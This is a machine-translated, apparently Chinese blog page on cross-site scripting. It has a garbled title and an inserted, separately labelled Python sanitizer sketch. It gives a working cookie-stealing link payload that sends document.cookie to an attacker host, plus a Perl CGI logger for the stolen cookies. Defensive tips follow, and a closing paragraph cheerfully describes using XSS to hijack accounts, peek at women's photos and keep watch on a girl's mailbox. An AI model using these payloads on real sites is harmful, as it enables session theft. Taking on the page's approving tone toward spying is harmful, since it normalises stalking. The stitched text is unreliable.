The bored Css cross station hangs the horse(4)
  Add date: 07/15/2008   Publishing date: 07/15/2008   Hits: 112

  [\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]

----Copied from GOBBLES SECURITY ADVISORY #33----
</snip>


A real example of capturing and logging cookies:

Note: for this to work, your browser must be allowed to accept cookies sent by the http://website.tld site.
When I tested the following, I used JavaScript to create the visitor's cookies, with the JavaScript placed in the index.html document.
OK, suppose below that http://website.tld has an XSS vulnerability, and the vulnerable link is:
http://website.tld/program.cgi?input=<evil javascript>
We construct a link like this:
http://website.tld/program.cgi?input=<script>document.location='http://yoursite.tld/cgi-bin/evil_cookie_logger.cgi?'+document.cookie</script>
Then get a user who holds a cookie for that site to visit this link.

This is our CGI script; its function is to log the user's cookie:

---------evil_cookie_logger.cgi-----------

#!/usr/bin/perl
# evil_cookie_logger.cgi
# remote cookie logging CGI coded by BrainRawt
#
# NOTE: coded as a proof of concept script when testing for
#       cross-site scripting vulnerabilities.

$borrowed_info = $ENV{'QUERY_STRING'};
$borrowed_info =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;

open(EVIL_COOKIE_LOG, ">>evil_cookie_log") or print "Content-type: text/html\n\n something went wrong\n";
  print EVIL_COOKIE_LOG "$borrowed_info\n";
  print "Content-type: text/html\n\n";
close(EVIL_COOKIE_LOG);

------------------------------------------

This script first obtains the cookie through $ENV{'QUERY_STRING'} and stores it in the $borrowed_info variable.
Then, through open(EVIL_COOKIE_LOG, ">>evil_cookie_log"), it saves the cookie information to the evil_cookie_log file.

Note: the JavaScript above may not run in some browsers or on some sites.
It is merely what I used for testing on my own site.

How to guard against XSS attacks?
1. Disable JavaScript in your web browser.
2. Developers must check their code carefully and validate submitted data effectively, for example "<" and ">".

"<" and ">" can be converted into &lt; and &gt;.
Note: because XSS vulnerabilities can be exploited in many ways, programmers need to understand which specific characters to filter.
This mainly depends on the function of the program being developed; it is suggested to filter all metacharacters, including "=".

As a potential victim, do not visit links that contain <script>; official URLs will not include any script element.
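
The conversion described above, as an added example (not code from the original page): a Python sketch of how a script such as program.cgi could treat its input parameter before echoing it into HTML. The function names and sample values are assumptions made here; besides replacing "<", ">" and "=", it rejects the overlong UTF-8 form of "<" quoted from the GOBBLES advisory earlier on this page.

```python
from urllib.parse import unquote_to_bytes

# Metacharacters replaced on output. "<" and ">" become entities as the text
# describes; "=" is included because the text recommends filtering it too.
ENTITIES = {"&": "&amp;", "<": "&lt;", ">": "&gt;",
            '"': "&quot;", "'": "&#39;", "=": "&#61;"}


def decode_input(raw_value: str) -> str:
    """Percent-decode a query value and decode it as strict UTF-8.

    Raises ValueError for malformed bytes, including the overlong form
    \\xC0\\xBC that a lenient decoder would turn into "<".
    """
    data = unquote_to_bytes(raw_value.replace("+", " "))
    try:
        return data.decode("utf-8", errors="strict")
    except UnicodeDecodeError as exc:
        raise ValueError("input is not valid UTF-8") from exc


def escape_html(text: str) -> str:
    """Replace every metacharacter in ENTITIES with its HTML entity."""
    return "".join(ENTITIES.get(ch, ch) for ch in text)


def render_input(raw_value: str) -> str:
    """Return the fragment a page like program.cgi could echo back."""
    try:
        return escape_html(decode_input(raw_value))
    except ValueError:
        return "[invalid input rejected]"


if __name__ == "__main__":
    # Constructed sample values for the "input" parameter.
    samples = [
        "hello+world",
        "%3Cscript%3Edocument.cookie%3C/script%3E",
        "%C0%BCscript>x%C0%BC/script>",
    ]
    for sample in samples:
        print(render_input(sample))
```

Decoding happens before escaping so that the characters being replaced are the ones the browser would actually see.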


--
* origin: http://sinbad.zhoubin.com
Over the past few days I watched sword heart and dog dog studying CSS (Cross Site Scripting), which can even be used to deceive mailboxes, and I was jealous… Not wanting to fall behind, I shamelessly asked for other people's results and studied them myself, ha-ha. In the process I discovered that my earlier concept of CSS was gravely mistaken: the harm of CSS is really not small. It can be used to plant trojans ("hang the horse"), steal cookies to gain privileges and so on; for killing a person and taking his possessions, an essential medicine! luoluo unexpectedly thought of using XSS in the NetEase schoolmate record to promote himself to class leader of other people's classes and peek at girls' photographs, the brute. The other day I heard dog dog say that a short-message notification function had to be written, since a session expires and one cannot keep watching a girl's mailbox all the time. I carried this matter with me through a week of traveling, came back this morning and completed the short-message notification function, ha-ha, happy…

 
